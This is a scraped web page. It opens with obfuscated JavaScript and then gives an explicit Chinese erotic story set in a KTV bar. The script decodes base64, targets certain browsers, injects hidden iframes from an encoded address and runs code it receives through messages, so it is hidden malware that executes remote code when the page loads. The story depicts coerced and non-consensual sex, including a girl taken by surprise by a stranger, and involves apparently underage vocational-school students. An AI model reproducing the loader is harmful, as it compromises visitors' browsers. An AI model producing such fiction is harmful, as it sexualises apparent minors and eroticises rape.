各种地点野战h_3p痉挛高潮h

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
</tr>

</table>

<tr>

<td>

<div id="content" name="content" style="line-height: 190%; color: rgb(0, 0, 0); ">少年阿宾卅三多事kv

创作者:ben

创作完成日:1999.01.15台湾

钰慧寒假一回到高雄,便想找份临时的工读自己赚学费,因为大哥钰宪结婚後不久就和大嫂搬出去外面了,所以家里有点冷清,好不容意她放假回来了,她爸爸妈妈不愿意钰慧又跑太远去上班,刚好她爸爸的朋友王叔叔新开了一家kv,於是替她找了柜台结帐的职位,让她就近上下工。

这是个时髦的新行业,王叔叔第一天带她到店里,介绍那里的经理给她认识:“这是戴小姐,这是钰慧,戴小姐处理公司的所有事情,你多跟她学学。”

“是”钰慧答应着。

“叫我n好了。”戴小姐说。

因为这样,钰慧这个冬天就在这边工作,她固定上早上十点到下午八点的班,晚上就会有另外一个会计小姐来替换。

这家kv中,外场组长是一个长得邪里邪气的男孩子,廿五六岁,叫作罗正凯。正凯的弟弟正熹还在读高职,也是寒假来工读,正熹看起来也不怎麽正经,他们兄弟俩整天老喜欢四处吃女孩子豆腐,店里都是一些小妹妹,偏偏又都欢迎他们,只有钰慧讨厌他们吊儿郎当的个性,因此对他们不言笑,碰了几次钉子之後,他们就不敢来惹她了。

不过和正熹一起来上班,他的同学张宏铭就不一样了点,这人老老实实规规矩矩的,所以反而没有他们兄弟讨女孩子喜欢。

两个礼拜过去,钰慧发觉宏铭有事没事就会走到她身边,搭讪一两句话,或是问她一些芝麻豆大的问题。钰慧也曾听到其他服务生的rur,说宏铭喜欢她,钰慧总是一笑置之。宏铭再来找她,她仍然佯作不知,毕竟她比他们都大几岁,成熟多了,应付这种场面绰绰有馀。

春节那几天,店里生意好得不得了,钰慧除了上白天的班,晚上也要在外场帮忙,正凯故意把她和宏铭排在同一区,替他制造机会。正凯指点宏铭一句至理名言,他说“烈女怕缠”,要宏铭努力到底,杨过还叫小龙女姑姑呢。

几个晚上下来,虽然钰慧和宏铭更熟悉了一些,却没有让宏铭有什麽斩获,甚至每天下班,她都请文强来接她,宏铭以为文强是她男朋友,心里既失望又吃味。新年才过完,钰慧向n提起要辞了工作,因为阿宾要她提早上台北,他妈妈一直叼念着钰慧怎麽过了年还不来。

宏铭听说钰慧要走了,心情down至谷底。钰慧上班的最後一天,晚上七点左右,夜班的会计小姐提早来交接,钰慧去向n辞行,n说了一些感谢慰勉的话,并且要她暑假一定要再来帮忙,钰慧答应了,说过byebye,退出办公室。

她走向员工的休息室,想要换掉制服,在走廊中却遇见正熹和宏铭挡住去路,正熹说:“钰慧姐,你要走了”

钰慧笑笑说:“是啊後会有期”

正熹说:“钰慧姐,宏铭有一些话想要对你说,你能不能给他一点时间”

钰慧犹豫的考虑一下,正熹说:“一下子就好”

说着便又推又拉的,将钰慧和宏铭挤进最角落的一间小厢房,自己退出来,留下她们俩人。

“好吧”钰慧无可奈何在沙发上坐下来,说:“你想说什麽呢”

宏铭嗫嗫的也坐到钰慧旁边,说:“慧姐,我我”

“吞吞吐吐,一次说嘛”钰慧一脸不高兴。

“是,是,”宏铭低下头,又突然抬起头,凝视着钰慧说:“慧姐,我┅┅我喜欢你”

钰慧听了之後只是看着他,安详的问:“然後呢”

宏铭的出招遇上空荡荡的反击,一鼓作气的坚强斗志忽然溃不成军,不知道要再怎麽接话,瞠目结舌,傻在那里。钰慧看他可怜,说:“傻孩子,我有男朋友的。”

“我知道”宏铭难过的说,他想的是文强。

“等你再长大一些吧,”她想早些脱身,便替他画一个大饼:“说不定我会喜欢你也不一定”

“真的吗”宏铭果然觉得略为安慰。

“嗯”钰慧点了点头。

“那”宏铭问道:“我可不可以有一个要求”

“什麽要求”钰慧谨慎的说。

“可不可以”他说:“让我握一握你的手”

钰慧微笑开来,她允许了,宏铭虔敬的扶起她的柔胰,小心的握揉着。

正熹离开那厢房之後,今晚客人不多,便溜到厨房想偷懒一下,结果进去之後,厨房只有一个也是来工读的家商女生叫翠凤,正在切柳丁花,他来到她背後,合手一抱并且吻在她耳朵後面,轻声的叫唤她的名字。

翠凤简直连骨子都软了,她和正熹这几天刚好打得火热,在店里算是公开的一对,初坠爱河的少女心思当然全系在男朋友身上,正熹不规矩的双手在她腰上搓来搓去,她的心里就一阵阵的甜蜜。

翠凤平时喜欢简单的装扮,牛仔裤白球鞋,俏皮可爱,像个小男生一样。但是上班规定一定要穿制服,她们店里的女生制服一律是桃红色的背心外套,又紧又短的小窄裙,白色丝质衬衫,结着一只小红蝴蝶结,翠凤穿的这样,钰慧穿的也是这样。正熹的手现在就是从白衬衫的下方往上面挪,移到她小巧的胸脯上,翠凤丢下工作,警觉的抓住他,拒绝他的侵犯。

最近几晚,他已经试过好几次想进一步和翠凤亲热,都被她抵挡下来,其实正熹在学校也有女朋友,他并不怎麽在乎和翠凤的结果,所以也就算了。但是今晚知道宏铭和钰慧在厢房里,而且刚才他还教过宏铭几个绝招,就算宏铭吃不起全餐,捞些沙拉浓汤总会有吧想起钰慧丰满玲珑的身材,他自然涌起强烈的情绪,因此不顾翠凤的抗御,强横的用手掌占据了翠凤的shuangru。

翠凤身材娇小,溽房刚好盈握,被正熹巧妙的搓揉过之後,糟糕的舒服起来,她从没被男人爱抚过,初次经历这种快感,当然没有馀力再想反对,她斜靠在正熹怀里,停下了手上的动作。

而宏铭在厢房之中,正熹所教的秘技是一招都没用上,就被钰慧彻底化解掉了,他现在只是可怜的执着钰慧的手,利用最後的机会触摸个够。钰慧的手掌软细温柔,手指纤幼修长,正熹揉了一会儿,试探性的拿到脸上触着,钰慧看他渴望的样子,就不反对,还疼惜的抚着他的脸庞。

宏铭受宠若惊,钰慧神圣的玉手摸在脸上,太感动了,他心情激荡,忍不住吻了钰慧的手,小鸡啄米一样的啜个不停。钰慧被他惹得吃吃轻笑,他见钰慧没有责怪的意思,胆子便又大了起来。

“慧姐,”他巴望的说:“我可不可以再有一个要求”

“什麽”

“我我”他忐忑地问:“我可以亲一下你的脸颊吗”

“你有些过份哦”钰慧瞪了他一眼。

“求求你”

钰慧吃软不吃硬,拿他没有办法,就默许了。宏铭高兴的简直要翻起斗,他小心翼翼的靠近钰慧,钰慧甚至可以听见他狂乱的心跳,她也有些感动了,阿宾和文强都还没曾对她表现过这样强烈的悸动,可惜她还是无法喜欢宏铭,她侧抬起脸,等待宏铭来吻她。

宏铭知道机会只有一次,忽然舍不得就这样亲下去,他把脸靠得很近很近,先用力的嗅着钰慧的香味,又将鼻尖磨在钰慧脸上,钰慧无奈的笑了笑,终於,宏铭将嘴巴贴上她的嫩颊,长长的吻着,钰慧礼貌的闭上眼睛,宏铭亲了将近一分钟,才依依不舍的将嘴移开。可是当场他就後悔了,他马上又吻回去,并且无理的上下吻个不停,钰慧不满的训斥他,骂说:“你不是说亲一下吗”

“唔”他急中生智:“每次一下。”

说完又想吻上来,钰慧要躲,他一家伙搂过来,让她躲也躲不掉,就摇着头闪避着,宏铭却了个空,准确的吻到她的唇上。钰慧配合公司的规定,上班时涂着口红,两三下就被他吃完了,宏铭猴急的伸出舌头,想度进钰慧的嘴里,钰慧不肯,他牢牢的捧着她的头,她只好不情愿的启开牙齿,放他入来。

宏铭一钻进她的小嘴,立刻到处找她的香舌,慌张的挑来勾去,钰慧真是啼笑皆非,看他小孩子装大人,纰漏百出,一时好心,就温柔的缠住他的舌,阻挡他的骚动,让他体会真正接吻的甜蜜。宏铭孺子可教,没多久就明了了要领,也放慢动作,唇舌互用,和钰慧吻得又热又湿。

很久很久,她们才分离开来,俩人都红透了脸,钰慧喘着问他说:“够了吧”

宏铭说:“我我还想有一个要求”

“咦”

厨房里,正熹的怪手已经有一只从翠凤被解开的衬衫扣缝中,探进去在她的半罩内衣上抚摸着,她穿着无肩带的内衣,正熹轻易的就将罩杯替剔开,指缝将她小小的rujian夹住,还不停的摇着。翠凤无处呼救,正熹吻在她耳上的嘴不断的呵气,她昏眩得几乎要不支倒地,连忙抓着正熹的手臂,指甲深掐入他的肌肉之中。

正熹的指尖又绕着她的ru晕画圆,弄得她昏淘淘痒痕痕的,翠凤吐气如兰,转开被正熹吃着的耳朵,向後索吻,正熹沿着脸颊一直舔到她的唇上,她热情的小舌头早就等在那里,马上天雷地火,狠狠的彼此相互xishun。正熹贪得无餍,右手垂下到她的大腿上,然後不停的向上搔扰,摸进她的裙子里去。

“正熹”翠凤shenyin着:“会有人来”

“没关系的别怕”正熹随便敷衍她,同时拇指已经突击到她的三角洲,碰到了一块又软又有弹性的丘陵地。

“啊不要”翠凤说。

“啊不要”钰慧说。

钰慧现在被宏铭推倒在沙发上,宏铭正在强行剥开她的白衬衫,他一步一步的提出要求,陷钰慧於难以招架之地,他也没料到正熹教他的绝招跟本没有用,反而他自己的哀兵政策奏效了。他解除了钰慧的几颗上衣钮扣,拉开她的衣襟,钰慧雪白而峰峦起伏的趐胸裸露在他面前。

“啊不要”钰慧又说。

不要也没有用,宏铭一头往她怀里钻,同时在她胸膛到处吻着。钰慧用手去推他,可是一点都推不动,宏铭意志坚定,双手合力一扑,将两只半球都压在手掌心里,钰慧是那麽饱满,他只能掌握到每边的三分之二,他感觉触感好极了,尤其是手指的部份,因为是抓在xiongzhao所没包覆到的美肉上,更是令人隽永难忘,。

宏铭无师自通,十指拢拗不定,将钰慧捏得也躁乱如麻,他更用指尖将钰慧的xiongzhao布端勾下,钰慧心里头又慌又急,可是也无法阻止溽房弹跳出来,那对溽房浑圆坚实,细腻无瑕,粉红的rujian半挺半软的嵌在小巧的ru晕之中,宏铭看得裤子里头的ji=ba急急地冲动涨硬,无名火在胸口熊熊焚烧着,他已经没空去慢慢的提出要求,不再问过钰慧的同意,便迳行张嘴将她的左侧rutou含进嘴里,不停的吸啖着。

就在这时,正熹已经将翠凤的上衣大喇喇的敞开,年轻诱人的少女胸膛展露出骄傲的隆挺,翠凤果然是没有经验,甚至连挣扎的动作她都很生疏,她只是哀恳的说:“会被人看见”

正熹索性左掌将她的双眼遮覆住,说:“看不见了”

这简直掩耳盗铃,可是翠凤陷入黑暗之後,反而真的不再挣扎,乖乖的让正熹上下其手,正熹右手技巧的穿过翠凤的三角裤跟的松紧带,摸到她的茵茵草原。翠凤年纪虽小,毛发却异常旺盛,整片密密麻麻,正熹虽然还没看到,也想像得出那苍苍郁郁的样子。翠凤最丢脸的秘密被人发觉,浑身热烫,正熹还步步相逼,接触到草丛底下潮湿的软肉。

“啊”翠凤忍不住叫出来。

正熹的指头是魔鬼,他在翠凤的两腿间熟稔的抹划不停,翠凤只觉得心情一bobo的起荡攀高,下身好像有一股暖流在到处游窜,她自己不知道浪水已经滂沱而出,只是怯怯地紧掠着身体的快感,唯恐它一闪而逝。

正熹探在翠凤鹰阜上的两指早已黏稠答答,他藉着她的分泌,轻松的分开她裂缝的前端,翠凤立刻产生一种忡忡的紧张感,正熹两指又一夹,她差点没当场昏死过去,因为他正捏在她娇嫩的鹰蒂上,她双腿觫觫发抖,水流泛滥得连她自己都有发现了,她怎麽还站得住脚,软棉棉的就要向下瘫倒,正熹急忙揽住她的腰,将她放趴在流理台上,她失魂落魄任人摆布,正熹将她的紧身短裙向上提摒而起,她圆圆丰丰的tunbu,绷着一条小小的三角裤,上面还有可爱的卡通印花,正熹没空欣赏,一把就将它扯到她的膝盖弯。

钰慧的一对rutou被宏铭舔得高高站起,她的水份比翠凤还丰沛,不同的是她自己知道身体必然的反应,她一直想起身逃走,却生不出足够的力气,宏铭对两只蓓蕾左右轮番的噬食,并用身体将钰慧的双腿隔开让她无法并拢,以他坚硬勃起的裤档去压迫她的si-chu,钰慧仅管一百个不愿意,终究还是产生应有的美妙,她“噢”的呼出感叹,宏铭再蠢也懂得她在动情,就磨得更努力了。

宏铭放开钰慧的rutou,抱紧钰慧,又一次和她湿吻起来,钰慧也不自主的回抱着他,俩人下身相互挪蹭,宏铭感到钰慧那里透过来温暖的热气,烘得他的ji=ba直挺挺的发颤,他心里一阵栗怅,周身的欲火非得要发泄不可,他着急的要去脱钰慧的neiku,钰慧自然地扭动抗拒,他失去对女性应有的柔情,双眼涨红,手上粗鲁暴戾,将钰慧的neiku左右一扯,“嘶”地撕裂开来。

钰慧“唉哟”一声,两手赶紧护住失去屏障的鹰户,宏铭弃掉她残破的neiku,跪在地上,冲动的在解去自己的裤头,用力一褪,连neiku都一起脱下,他抓住钰慧的双手一分,钰慧便无险可守,他把那烘烘烫烫的ji=ba凑在她的鹰唇上,俩人又都同时起了鸡皮疙瘩,他冒然的往里一送,却是窒碍难行,弄得钰慧痛苦的皱起眉头。原来钰慧虽然里外湿透,他却乾燥无比,宏铭几次总是插不进去,但总算把前半截都弄得够润滑了,最後一次攻坚,终於畅通无阻,整根ji=ba没留空隙的进钰慧身体内。

宏铭和钰慧同时舒服的喘了口气,特别是宏铭第一次尝到男女间绝佳美味,对象又是深深单恋着的钰慧,从心理到身理,全都痛快万分,他将ji=ba紧紧的抵实在钰慧的xiao+xue儿中,享受那一生难得的经验。

钰慧被小男孩半暴力的迫使就范,也产生一种微妙的快感,男生的ji=ba都已经进到体内,多说无益,便由他去吧

翠凤光着屁股被架伏在流理台上,正熹已经从裤炼缝中掏出yanju,他的yanju弯翘得异於常人,弧度十分夸张。他就显然比宏铭有经验多了,他将鬼头先触在翠凤的洞口,磨来磨去让翠凤难过不已,当他觉得时机够成熟了,就把鬼头逐渐的推进她肉里,他睁大眼睛,看着翠凤的xiao+xue将红红亮亮的鬼头吞没,实在太过瘾了,他稍稍退出,正准备一举夺走她的处女身,偏偏墙上的对讲机在这时刺耳的“铃铃”响起。

“喂”正熹恨恨的将话筒抓过来,应答着。

“宏铭在那里吗”是守柜台的小姐。

“没有”他没好气的回她。

“没有戴小姐在找他,”对讲机那一头说:“那我到厢房去找找看好了。”

这怎麽可以宏铭上班时间和钰慧躲在厢房,如果被发现那就糟了,正熹立刻说:“不不用,我替你去找他好了”

他挂上话筒,不得已的把ji=ba和xiao+xue分开,扶好翠凤,告诉她等他一会马上回来,穿好裤子,就匆匆的往宏铭在的那房间去了。

翠凤在紧要关头被弃而不顾,一脸愕然还不知道发生什麽事,只好可怜兮兮的自个儿转背着门口,弯下腰来,想要将neiku穿好。忽然一阵晃动,又被人从後面抱住,正熹怎麽真的快去快回她回过头想要问他,却吓了一大跳,那人不是正熹,是他哥哥正凯。

翠凤急忙挣动,正凯却拎小鸡一样的把她提抱到流理台上,回复刚才等候的姿势,并且一手压制着她的背,让她不能起来,另一手在裤档中找到ji=ba拿出来,真是有其兄必有其弟,正凯的ji=ba也是滑稽的转着大弯。

当然翠凤看不到那景像,她只觉得正凯也和正熹一样,将一根rou-gong子的前端在她敏感的鹰门上逗来逗去,惹得她十分舒服,恍忽之间,她竟然分不出正熹和正凯的差别了,快乐的感觉一步步的漫延全身,她禁不住热切的期待着,期待下一刻还会有什麽意外的畅美。

突然一阵剧烈的刺穿,翠凤痛楚难忍,“哇”的大叫起来,正凯已经突破了她那一层膜,正式的占有了她。

正凯一直沉默不语,直到当ji=ba全部都插满她的xue儿时,才放开压着她背的手,抚在她的脸颊上,抹走她的泪水,温柔的说:“乖,一会就不痛了。”

翠凤真的是很好哄的女孩,正凯不停的对她轻声说一些贴心话,她就有点搞不清楚状况了,而且正凯也不停的偷偷抽动ji=ba,让它缓缓地在她紧凑的膣腔中来回拔出送入,说也奇怪,方才她还疼得死去活来,一转眼却马上就没有了苦涩感,取而代之的是新奇而充实的满胀舒坦,她为此犹豫的回头看着正凯,正凯正也看着她,她脸儿突然羞得通红,立时又转头回去,脖子压得低低的,不敢抬起。

宏铭压在钰慧身上,ji=ba歇都不歇的在她xiao+xue中快速的抽动着,钰慧想要压抑那恼人的舒服感觉,却反而越来越难忍,他的每一刺进退出都让她酸麻十足,更何况他干得那麽凶,终於她防线全面崩溃,欢愉的叫出声来。

“啊啊宏铭啊啊”

“舒服吗慧姐。”

“哦哦舒服很舒服宏铭很棒啊”

宏铭得到赞美,更是拼命的埋头苦干,插得钰慧水花四溅,xue儿不停的收缩抽。

“啊啊很好很好啊宏铭好弟弟太美了啊啊姐姐姐姐不妙了啊啊”

钰慧一直就是这样脆弱,没几回合,已经高氵朝了一次。

“咚咚咚”就在这时,敲门声响起。

“宏铭宏铭”是正熹在外面叫他。

宏铭和钰慧都吃了一惊,他连忙回答:“什什麽”

“n在找你,你先出来一下吧”正熹说。

宏铭ji=ba还硬得厉害,如何能半途而废,钰慧趁机会将他推走开来,拍了拍他的脸,温柔的说:“快去吧”

他只好站起来整理过衣服,告诉钰慧说:“姐姐,一定要等我回来”

然後他推门出去,正熹等在那里:“在她办公室,不知道什麽事”

宏铭一脸不高兴,往办公室走去。正熹等他走过转弯处之後,就开门进到厢房,钰慧已经穿好了衣服,正在整里头发,看见他进来免不了脸红了一下,故做镇定的跟他随口问候一声。

正熹看着钰慧,他当然也喜欢钰慧,只是钰慧根本从来不理他,他当然更知道钰慧和宏铭几分钟前在搞什麽鬼,他刚才和翠凤的亲热也是活生生被打断,火儿还没退呢,瞧着钰慧红润的双颊,前凸後翘的体态,他不免想入非非。

钰慧见他色眯眯的望着自己,心底有点发毛,便站起来想走出厢房,突然发现刚才被宏铭撕破的neiku,正该死的躺在地上还没收,正熹也看见了,这小东西让他产生无比的冲动,他向钰慧扑去,俩人都跌倒到地毯上面,正熹三两下找到她短裙的扣头,不礼貌的强解开来,在钰慧的反抗中,硬将它脱去。

於是钰慧便chiluo了下身,她像熟虾一样的卷曲身体,不愿让正熹看见,正熹却搂住她,从她的屁股後面向前摸到xiao+xue,真是防不胜防,她那儿还湿着呢,正熹的中指要命的准准抠在她鹰蒂上,没多久前刚泄过的xue儿马上又活络了起来。

“不要”她作垂死讨饶。

正熹岂会心软,他还是利用中指,快速的插进钰慧的rou+dong里,狠狠的掏了几十下,将钰慧挖的哇哇大叫,然後他将那中指举到鼻头嗅了嗅,没有津液的味道,看来宏铭并没有完事,便放心的掉头侧卧朝着钰慧的屁股,手臂撑穿开她的大腿,一口就往她的鹰唇吃去。

钰慧最怕男人的这招,xue儿已经不听话的泛起汹涌春潮,正熹舌头灵巧地在大小鹰唇间tian吮,钰慧就用不停的浪水报答他,虽然嘴巴上还是虚伪的直说不要,身体却诚恳的供出了实情。

正熹见钰慧浪态渐露,就放开她被他挽抱着的大腿,钰慧果然并不逃跑,他又舐了一会儿,钰慧开始“嗯嗯”的哼起,他故意停下来不动,钰慧就轻摇着屁股表示难耐,正熹不理会她,钰慧心里头着急,却不敢要他来舔,屁股越摇越用力,正熹依然不动如山,她终於不顾脸皮了,出声请求他。

“嗯嗯舔再舔我嘛”

正熹不理。

“正熹好弟弟舔舔我啦好不好”

正熹听她称呼得亲热,才满意的再伸舌头替她舔上去。

“哦哦正熹正熹对对好舒服姐姐喜欢你┅┅啊啊深一点深对像这样啊啊舒服死人了啊啊好情人好爽啊啊天啊天啊我我┅┅正熹啊我要我要啊我要你”

钰慧放浪形骸,纵声高叫,幸好kv的隔间防音效果都很好,传不到外面。正熹知道她骚极了,就爬起身来,将她也扶起,要她站直双腿,再把腰身弯伏到沙发上面,那沙发矮矮的,因此钰慧的屁股就变成十分樱荡的角度翘着,正熹解开裤带,这一次他将下身都脱光,那弯弯硬硬的ji=ba摇摆不定,他将鬼头对准钰慧的xue口,俩人都已经准备充份,他向前一突,就亲蜜的接合在一起,jjiaogou开来。

“啊啊好真好啊正正熹亲弟弟美死姐姐了你真会哦对用力插哦姐姐不怕啊越用力越爽啊啊”

钰慧也没想到自己会变成这麽saolang,这一切要怪阿宾,整个寒假钰慧都芳心寂寞,眼看就可以相见了,却被别人轮流地把qingyu挑逗得无法收拾,现在插都插了,还管什麽,爽够了再说。

“噢噢我好美好美啊啊咦正熹你再插啊不要停嘛”

“不要”正熹说:“我要你自己动。”

钰慧快被他整死了,只好自己前後摇动着身体,让ji=ba进进出出,可是她还是骚得难过,她再次柔声地恳求正熹说:“好弟弟你chawo嘛”

其实正熹是因为觉得快要射出来,所以才突然煞车,然而她的媚态实在让他忍不了,他猛的捧住钰慧的屁股,疯狂的choucha不停,钰慧乐得两腿发抖,尿尿一般的浪水顺着大小腿流到地板上。

“哦哦好弟弟真勇猛啊姐姐真的浪透了啊我要丢了快再多chawo几下让我飞上去啊啊”

“好姐姐,”正熹也快完蛋了,他喘着说:“shejin你里面可不可以”

“可以可以啊啊我我来了啊啊”

同一时间,正熹的ji=ba突突的跳了跳,一口一口的吐着浓痰,蛇精了。

而正凯的ji=ba还插在翠凤的小saoxue动个不停,翠凤实在觉的很受用,可是不敢叫也不会叫,她只觉得下面无比臊热,正凯的抽送使她全身都很痛快,她好像坐云宵飞车一样的一下又一下的高低起伏,也好像陷进了一个无底深坑一样的没有终止地疾速跌入,她只能“啊啊”的呼唤着,面临着未知结局的神秘之境。

但是终点还是来了,正凯轻哮了一声,然後就不动了,只是这样,翠凤心中不免有些失望,只是这样

正凯拔出软化了的ji=ba,又对翠凤说了一些肉麻的话,翠凤变得很冷静,并不理会他说什麽,只是自己擦拭身体穿好衣服,正凯罗嗦了半天,就离开厨房了,翠凤继续去切她还没切完的柳丁,心中忽然一阵酸,两行热泪滑过了她红的脸蛋儿,滴在手背上面。

正熹陪钰慧出来到大堂,钰慧不可能再留下来等宏铭了,否则场面恐怕难以收拾,正好文强到了要来接她,她急忙的跑过去挽在文强臂上,头也不回的出门而去。

没事了吗

不宏铭进到办公室,事情还多着呢

宏铭心不甘情不愿,将硬ji=ba藏在裤中,踏进办公室里,n见他进来,要他先坐在旁边的沙发上。n把手上的事情稍微close一下,然後也坐到他的旁边,训起话来了。她责备他最近工作粗心,有好几件客人的投诉,虽然寒假就要结束,她要他在工作期间还是要专心做事,不要时常犯错。

宏铭一心只牵挂钰慧,不晓得这时候钰慧已经在正熹的玩弄下婉转娇啼着,n却越念越多,他左耳进右耳出,根本听不进去,只是一颗头机械式的点着点着,突然注意到,n的前襟敞着二颗钮扣,其实她的上衣平时就都是这麽穿,宏铭却第一次如此靠近的看着她,发现她因为双肘压在膝盖上和自己说话,只看到肥孜孜的胸部没有保留的曝光出来,n卅馀岁,娃娃脸妈妈身,其实她就是钰慧那王叔叔的情妇,身上也有一种掩不住的风骚气质。

宏铭目不转睛,看见白肉周围有xiongzhao的蕾丝边,但只是罩住了丰满溽房的下半,那泛红而满涨的白皙嫩肉,以及鲜红微露的奶头,全部清晰地、活色生香地呈现在宏铭眼前,他原来就硬着的dajiba因此更加亢奋。

n说话间发现宏铭表情凝滞,直愣愣的双眼正猛盯着她因弯腰前倾的饱实胸部。她俏美白晰的脸儿,顿时浮起两朵红云,心头也卜卜乱跳不停,被年轻的男孩看见自己傲人的本钱,不禁莫名其妙的紧张起来。

她当然知道自己胸部丰满,一直都会引得男人注目,但是被这样子近距离的眼光的侵犯,倒是比较少有,让她起了一种意外感受,她觉得宏铭的目光彷佛是一只看不见的手,正在揉握自己的溽房一样。心理阵阵悸动,rutou不禁坚挺起来,一股热流自丹田而起,si-chu竟然已经湿润。

她粉脸娇羞,不自在地娇嗔道:“宏铭你你眼睛在看哪里”

宏铭猛的回过神来,说:“对不起,n,我你你实在很好看。”

n身上飘散着成熟少妇清淡幽香,令人陶然欲醉,宏铭有了对钰慧的经验,他大胆的凝视着她,鼓起勇气说:“n,你的溽房bainen嫩的,又饱饱满满的,好可爱。”

n被他说得一脸煞红,觉的下体更湿了。她本想斥责他,却不自主的说:“溽房可爱是我的事,你你又想怎麽样呢”

宏铭说:“我我好想摸摸它一把”

n听完一怔,宏铭的轻佻言语,令她呼吸急促,浑身起了个冷颤。没想到,只因为这个打工男孩的逾矩挑逗,引动了她内心深处的骚劲,脑海中想像起被男人搓揉溽房的情形,好像宏铭的双手真的已经在自己的胸前游走,快感涌上心头,两眼轻轻一翻白,激动的造成子宫强烈收缩,突的一阵高氵朝,居然什麽事都还没发生,就已经先丢了,三角裤里湿得一塌糊涂。

“宏铭你你”她抚压着喘气而起伏不定的shuangru,一句话都说不完整。

宏铭当然不知道眼前的成熟美人,已经saolang成这种程度,还以为她在发怒,他心想一不作二不休,猛地双手抱住n,吻上她的芳唇,她被他这一突如其来的拥吻,更刺激得如触电般发抖,不禁失声叫道:“不要唔唔┅┅”

她全身发直,而且连打着寒噤,当宏铭的舌头伸进她的嘴里,和她搅成一团的时候,没用的n,鼻子轻哼一声,又第二次的丢了。

n终於想起当经理的尊严,便要推拒宏铭的搂抱,但经过两次秘密高氵朝之後,哪里还有半分力气宏铭将左手搂着她并不纤细的腰身,右手伸入半露的胸口衣领内,沿着光滑柔嫩肌肤向下滑,终於握住了她溽房。

他感到n浑圆尖挺有弹性,摸起来非常舒服,他的手又捏又揉,玩弄着n,那亢奋硬翘的dajiba躲在裤子里是不停的跳动点头。

